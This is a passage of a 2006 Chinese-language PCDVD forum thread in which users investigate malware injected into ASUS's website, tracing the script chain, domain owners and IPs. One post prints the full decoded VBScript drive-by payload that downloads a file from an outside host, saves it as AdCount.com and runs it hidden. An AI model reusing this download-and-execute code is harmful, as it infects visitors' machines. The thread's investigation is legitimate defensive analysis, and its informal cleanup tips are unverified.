PCDVD數位科技討論區
PCDVD數位科技討論區   註冊 常見問題 標記討論區為已讀

回到   PCDVD數位科技討論區 > 電腦硬體討論群組 > 系統組件
帳戶
密碼
 

  回應
 
主題工具
HSM
Golden Member
 
HSM的大頭照
 

加入日期: Jun 2002
您的住址: 嘎嘎巫拉拉
文章: 3,164
已經安裝了 怎麼辦 但是埽毒 掃沒病毒...
     
      
__________________
CPU : Intel Core i7 3930K + Venomous X
散熱膏 : AC MX4
主機板 : ASUS RAMPAGE IV Extreme
記憶體 : Kingston 16G DDR3-1600 kit
硬碟 : Crucial M4 128G (Raid 0)/Seagate 7200.12 1Tb SATA2 32M (Raid 0)/ Seagate 250GB SATA2 16M*2 (Raid 0) *2 / Seagate 1TB SATA2 32M * 3
Raid卡 : HighPoint 2310
燒錄機 : Plextor PX-880SA
顯示卡 : AMD Radeon R9 290X
音效卡 : Asus Xonar Essence STX
SPDIF : DDTS-100+Klipsch ProMedia 5.1 Ultra
RCA : M-Audio BX5a Deluxe
網路卡 : Intel 9400PT
電源供應器 : 新巨 HU2-5660V+G1-500W
滑鼠 : 羅技 MX Revolution
螢幕 : Sony KDL-32EX710
機殼 : 聯力 V2000
舊 2006-12-13, 04:21 AM #41
回應時引用此文章
HSM離線中  
艾魯
Regular Member
 

加入日期: Sep 2003
文章: 71
引用:
作者FlyNews
上了ASUS網站,重新整理一下,
雖然不會連上 http://www.hiet.tw/1.htm
但還是可在IE狀況列看到出現一下


而這個 hiet.tw的網域, 在 http://rs.twnic.net/ 查是這個人的
但資料也不夠,也沒有電話,真是奇怪!


Domain Name: hiet.tw

Contact:
liting

Record expires on 2007-10-20 (YYYY-MM-DD)
Record created on 2006-10-20 (YYYY-MM-DD)
Registrar: SEEDNET

好樣的,SEEDNET網域,那要抓人應該不是問題。
哪個笨賊放木馬連結還搞在台灣的...
還是那個網址被人挪用?
 
舊 2006-12-13, 04:33 AM #42
回應時引用此文章
艾魯離線中  
darksnow
Golden Member
 

加入日期: Aug 2002
文章: 2,806
引用:
作者HSM
已經安裝了 怎麼辦 但是埽毒 掃沒病毒...


如果你IE有定期更新,就不會中獎。
我先前實驗的是用WinXP SP2未更新的IE才會中
舊 2006-12-13, 04:42 AM #43
回應時引用此文章
darksnow離線中  
darksnow
Golden Member
 

加入日期: Aug 2002
文章: 2,806
引用:
作者艾魯
好樣的,SEEDNET網域,那要抓人應該不是問題。
哪個笨賊放木馬連結還搞在台灣的...
還是那個網址被人挪用?


下面寫seednet的意思是指那個DN是在seednet代理註冊的,不是在seednet網域喔。
不過也許不一定就是那DN所有人搞的,昨天在jp和global的網頁看到的木馬,
是放在 http://www.skys.com.tw/ 下面,猜測應該是被破台來偷放的
舊 2006-12-13, 04:48 AM #44
回應時引用此文章
darksnow離線中  
darksnow
Golden Member
 

加入日期: Aug 2002
文章: 2,806
引用:
作者FlyNews
後來再到 http://www.hiet.tw/1.htm 看了一下,一個空白的網頁, 裡面有個java的連結

<SCRIPT LANGUAGE="JavaScript" src="http://www.plmq.com/script/src/code.js"></script><SCRIPT LANGUAGE="JavaScript"> var v = "原本是一大串編碼,省略jbElEMSAgPSAiY2xzaSINCiAgICBjbElEMiAgPSAi"; document.write(aa(v,100));</SCRIPT>


而這個就是那個Java了! http://www.plmq.com/script/src/code.js
可以用文字檔的方式打開看看裡面的程式是什麼。


code.js解base64編碼的,用途是解後面那一大串編碼,
那串編碼的動作好像是去http://www.yyc8.com抓個東西來執行
舊 2006-12-13, 04:56 AM #45
回應時引用此文章
darksnow離線中  
小壞蛋
Elite Member
 
小壞蛋的大頭照
 

加入日期: Dec 2003
您的住址: 偽大鬍子冰人XD
文章: 7,327
好棒的華碩....昨天晚上幫朋友查個皇家的位置,底下又出現wwx.hiet.tw/1.htx,心想慘了,果然又中標了...

F-SECURE又掃不到了,去WINDOWS底下把off1win.dll改個名字重開機似乎又沒事了

剛剛再去看華碩看,又不會連到hiet

建議要去華碩官網的,先不要點進去好了

媽的,哪個華碩的人再跟我說他們網頁沒毒的,我就把p5b-dlx塞到他xx裡
__________________
這年頭,討論區商家比玩家多;外行比內行更有說服力;粗製爛造的葉珮雯比用心寫的測試文更多回應
開始學著多去解決其他人的問題來取代嘴炮,就當作是一種回饋吧!
還在抱怨為啥沒有新的文章沒有好的內容,何不想想自己貢獻了什麼?
再見!咱們夢裡見

PS:你還在買雞排店的產品嗎....請睜大眼看清楚,以免成為下一個受騙的對象

此文章於 2006-12-16 09:54 AM 被 小壞蛋 編輯.
舊 2006-12-16, 09:53 AM #46
回應時引用此文章
小壞蛋離線中  
chanp
*停權中*
 
chanp的大頭照
 

加入日期: Jun 2002
您的住址: 北市&板橋
文章: 1,761
這只是表示華碩的網站已成駭客的目標....

清除後又被植入惡意代碼,大家上網自求多福!!

還好沒看到"華碩網站、姦若磐石"這一句話
舊 2006-12-16, 12:52 PM #47
回應時引用此文章
chanp離線中  
SpeedRossi
Advance Member
 
SpeedRossi的大頭照
 

加入日期: Dec 2001
文章: 485
好久之前華碩的網站好像一定要用IE才能正常瀏覽下載
現在可以用FF正常瀏覽了,也讓我躲過一截啦
__________________
 用Firefox+Stylish調整PCDVD版面 - 2008/12/29更新,
 用Stylish解決Firefox顯示過長網頁不完全的問題 - New!!!
 簡單化的Yahoo!奇摩字典 - 好用!!!
 UserStyles for Badongo!! - 2008/12/06更新,吃便當輸入驗證圖不再吃力
 讓EvadeFilter變得不礙眼 - 2008/06/30更新,在FF3上正常了!
 以上皆適用於 Firefox 3 + Stylish 0.59
 Stylish 1.0以上的版本已經出了,但我用不習慣,所以以上的UserStyles皆只有在Stylish 0.59上測試。
舊 2006-12-16, 01:06 PM #48
回應時引用此文章
SpeedRossi離線中  
冬之炎陽
Advance Member
 

加入日期: Apr 2005
文章: 431
引用:
作者darksnow
code.js解base64編碼的,用途是解後面那一大串編碼,
那串編碼的動作好像是去http://www.yyc8.com抓個東西來執行


那堆編碼過的文字解碼之後就是下面的程式碼

代碼:
<html>
<scriptlanguage="VBScript">
onerrorresumenext
clID1="clsi"
clID2="d:BD96C556-65A3-11D0-983A-00C04FC29E36"
XML1="Mic"
XML2="rosoft.XMLHTTP"
AdoSqa1="Adodb.S"
AdoSqa2="tream"
oGet="GET"
fname1="AdCount.com"
SFO="Scripting.FileSystemObject"
SApp="Shell.Application"
dl="http://www.yyc8.com/script/src/rss3.css"
Setdf=document.createElement("object")
df.setAttribute"classid",clID1&clID2
Setx=df.CreateObject(XML1&XML2,"")
setS=df.createobject(AdoSqa1&AdoSqa2,"")
S.type=1
x.OpenoGet,dl,False
x.Send
setF=df.createobject(SFO,"")
settmp=F.GetSpecialFolder(2)
fname1=F.BuildPath(tmp,fname1)
S.open
S.writex.responseBody
S.savetofilefname1,2
S.close
setQ=df.createobject(SApp,"")
Q.ShellExecutefname1,"","","open",0
</script>
<head>
<title>InternetExplorer</title>
</head><body></body></html>
舊 2006-12-16, 04:01 PM #49
回應時引用此文章
冬之炎陽離線中  
tvirus
Golden Member
 
tvirus的大頭照
 

加入日期: Jan 2003
您的住址: 惡運深淵
文章: 2,562
C:\Documents and Settings\Administrator>ping www.hiet.tw

Pinging www.hiet.tw [210.59.231.234] with 32 bytes of data:

http://www.ripe.net/fcgi-bin/whois?...object_type=All

inetnum: 210.59.128.0 - 210.59.255.255
netname: HINET-TW

C:\Documents and Settings\Administrator>ping www.plmq.com

Pinging www.plmq.com [222.73.247.123] with 32 bytes of data:

http://www.ripe.net/fcgi-bin/whois?...object_type=All

inetnum: 222.64.0.0 - 222.73.255.255
netname: CHINANET-SH
descr: CHINANET shanghai province network

C:\Documents and Settings\Administrator>ping www.yyc8.com

Pinging www.yyc8.com [222.73.247.123] with 32 bytes of data:

台灣中途站為Hinet...
大陸終點站在北京...
舊 2006-12-16, 04:15 PM #50
回應時引用此文章
tvirus離線中  


    回應


POPIN
主題工具

發表文章規則
不可以發起新主題
不可以回應主題
不可以上傳附加檔案
不可以編輯您的文章

vB 代碼打開
[IMG]代碼打開
HTML代碼關閉



所有的時間均為GMT +8。 現在的時間是08:39 PM.


vBulletin Version 3.0.1
powered_by_vbulletin 2025。